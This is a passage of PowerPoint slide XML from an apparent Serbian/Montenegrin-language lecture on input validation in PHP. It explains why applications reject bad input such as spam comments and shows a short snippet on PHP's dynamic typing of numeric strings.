              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Ujedno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>omogućava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radimo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realnim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ispravnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podacima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odbacimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nepotrebne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Uzmimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kreiranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mejling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>liste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> – da li je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bolje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> 100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnika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ispravnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podacima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> 10.000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neispravnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Ili </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zamislite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da se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našem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kompanijskom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>blogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nađe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> 100 SPAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentara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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrže</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>linkove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neželjenog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadržaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>maliciozne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kodove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nanijeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>štetu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>našim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnicima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a: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1591649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B10A0-BADE-467A-B54E-14D1B679C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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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57126-6053-46E5-BA65-9D353D13C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025525"/>
            <a:ext cx="7194550" cy="5375275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Trebamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vidu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stringovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekstualne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da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ako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one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikazane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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brojne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>oni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dalje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stringovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radi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različitim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tipovima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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mijenja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dinamično</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>hodu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Ako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>deklarišemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stringovnu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>promenjivu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sadrži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ″23″, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sabrati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bilo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kojim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brojem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Ovaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nikako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnosni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rizik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>već</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karakteristiku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP-a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dobri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>programeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>moraju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imati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umu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kakvim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tipovima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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. To je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jedna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>osnova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pravilne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validacije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inputa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400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-ME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46C518-F70C-4E02-A937-FB2A3D38A6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3486308"/>
            <a:ext cx="8401050" cy="12380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1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&lt;?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php</a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-CS" altLang="sr-Latn-RS" sz="1500" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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2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$broj = "23" // razlikuje se od $broj = 23;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3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$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novi_broj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 = $broj + 3; // 26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4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4198427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D5CF2-CF8F-44AE-9209-6DBF85BF4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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>brojnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>vrijednosti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973B71-BEA1-43EE-ABEB-A10B1A7F5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pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brojnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>veoma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavna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omogućava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nam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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radimo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ispravnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podacima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da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>veoma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>povećamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>naše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Konkretno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stranicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja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osnovu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komande</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
